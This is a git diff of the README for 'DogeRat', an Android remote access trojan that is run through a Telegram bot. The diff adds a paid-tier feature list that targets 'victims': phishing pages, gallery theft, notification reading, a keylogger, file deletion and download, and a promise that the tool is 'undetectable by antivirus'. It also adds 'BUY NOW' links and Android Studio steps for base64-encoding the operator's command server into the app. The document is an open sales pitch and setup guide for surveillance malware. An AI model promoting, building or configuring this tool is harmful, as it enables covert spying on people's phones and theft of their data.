Compare commits

..

10 Commits

Author SHA1 Message Date
shiva yadav
23f7f8afa0
Update README.md 2023-08-20 03:31:10 +05:30
shiva yadav
6d19c196ae
Update README.md 2023-08-20 03:27:17 +05:30
shiva yadav
495da70947
Update README.md 2023-06-01 22:23:05 +05:30
shiva yadav
349406f660
Update README.md 2023-06-01 22:22:34 +05:30
shiva yadav
8cfb68fd48
added premium version README.md 2023-06-01 17:12:23 +05:30
shiva yadav
afd4d04d47
Update README.md 2023-05-19 00:16:22 +05:30
shiva yadav
d276b0475d
Update README.md 2023-04-25 14:55:34 -07:00
shiva yadav
f5130fa9d7
Update README.md 2023-04-24 01:36:16 -07:00
shiva yadav
d3d855e88e
Update README.md 2023-04-24 01:32:26 -07:00
shiva yadav
115e053417
Update README.md 2023-04-24 01:22:41 -07:00

View File

@ -10,7 +10,6 @@
<img src="https://dogelina.com/dogs/scr.jpg" alt="Logo" />
</p>
## Features
- 🔴 Real time
- 🌐 custom web view
@ -33,7 +32,29 @@
- ✅️ auto start after device boot
- 🔐 Keylogger {Availbe in apk v1 and v2}
- ✨ Beautiful telegram bot interface
-🤖 Undetectable by antivirus
- -🤖 Undetectable by antivirus
## DOGE RAT PAID VERSION FEATURES
🔐 Open any phising page in victim device
- 🖥️ Screenshot (get screenshot from your victim device)
- 📒 Gallery puller (Get all photos available in gallery)
- 🔔 notification reader
- 🔔 notification sender (send custom notification that apper on target device with custom click link)
- 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
- 🔤 Advance Keylogger
- 📁 PowerFull file manager {delete and Download Files}
- ✨ Beautiful telegram bot interface
- 🤖 Undetectable by antivirus
<p align="center">
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
<a href="https://t.me/shivaya_dav">
<img src="https://img.shields.io/badge/BUY-NOW-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
</a>
</p>
<h2>Requirements</h2>
<ul>
<li><span style="color: #0074D9;">APK EDITOR</span></li>
@ -106,6 +127,36 @@ Copy url and minimize the termux
}
```
## How to Build in Android Studio
To build the application in Android Studio, follow these steps:
1. Open the Android Studio and import the application source code.
2. Navigate to the following path in the source code: `Utils/AppTools.kt`.
3. In the `AppTools.kt` file, locate the `data` variable and copy your server information into it.
4. However, before copying the server information directly into the variable, you must encode it using Base64.
5. Here is an example JSON structure for your server information:
```
{
"host" : "",
"socket" : "",
"webView" : "https://www.google.com"
}
```
6. Fill in the above JSON structure with your server information.
7. Go to https://www.base64encode.org/ and copy the encoded result of your JSON data.
8. In Android Studio, paste the encoded result into the `data` variable.
9. The final code should look like this:
```kotlin
fun getAppData(): AppData {
val data = "<your encoded server info>"
val text = decode(data)
return json().fromJson(text, AppData::class.java)
}
```
<h2 align="center">🔗 Contact and Social Media Accounts</h2>
@ -119,7 +170,7 @@ Copy url and minimize the termux
<a href="https://twitter.com/CyberShieldX">
<img src="https://img.shields.io/badge/CONTACT-TWITTER-blue?style=for-the-badge&logo=twitter" alt="Twitter Badge"/>
</a>
<a href="https://www.youtube.com/channel/UCIQVMD1wD0M02V2JbVP_KrA">
<a href="https://www.youtube.com/@sphanter/about">
<img src="https://img.shields.io/badge/CONTACT-YOUTUBE-red?style=for-the-badge&logo=youtube" alt="Youtube Badge"/>
</a>
</p>
@ -148,26 +199,30 @@ Copy url and minimize the termux
<h2 align="center">🍻 Support 🍻</h2>
<p align="center">
<a href="https://www.buymeacoffee.com/yourusername">
<img src="https://img.shields.io/badge/-Buy%20Me%20a%20Coffee-orange?style=for-the-badge&logo=buy-me-a-coffee&logoColor=white" alt="Buy Me A Coffee"/>
</a>
</p>
<h1 align="center">Sponsorship</h1>
<p align="center">Support this project with cryptocurrency:</p>
<p align="center">If you find my work valuable, you can show your support by sponsoring me.
Your contribution will help me maintain and improve my projects, and it will encourage me to create more useful content.</p>
<p align="center">
Bitcoin: 1LeLwYyDHu51875aenZaNcEnMrEbHwEKJd<br>
USDT TRC20: TWX456AoupoYKwCYUKk3ZMWJtNJZRRHnrp
<a href="https://www.buymeacoffee.com/shivayadav"><img src="https://img.shields.io/badge/-Buy%20me%20a%20coffee-orange?style=for-the-badge&logo=buy-me-a-coffee&logoColor=white" alt="Buy me a coffee"></a>
</p>
<h3 align="center">❤️ Thank you Supporters ❤️</h3>
<p align="center">
<p align="center">Thank you to the following people for their support:</p>
<div align="center">
<a href="https://github.com/shivaya-dav/DogeRat/stargazers">
<img src="https://img.shields.io/github/stars/shivaya-dav/DogeRat?style=for-the-badge&color=yellow" alt="Stargazers repo roster on GitHub"/>
<img src="https://reporoster.com/stars/dark/shivaya-dav/DogeRat" alt="Stargazers" title="Stargazers" width="400" height="auto">
</a>
</p>
-------------------------
<a href="https://github.com/shivaya-dav/DogeRat/network/members">
<img src="https://reporoster.com/forks/dark/shivaya-dav/DogeRat" alt="Forkers" title="Forkers" width="400" height="auto">
</a>
</div>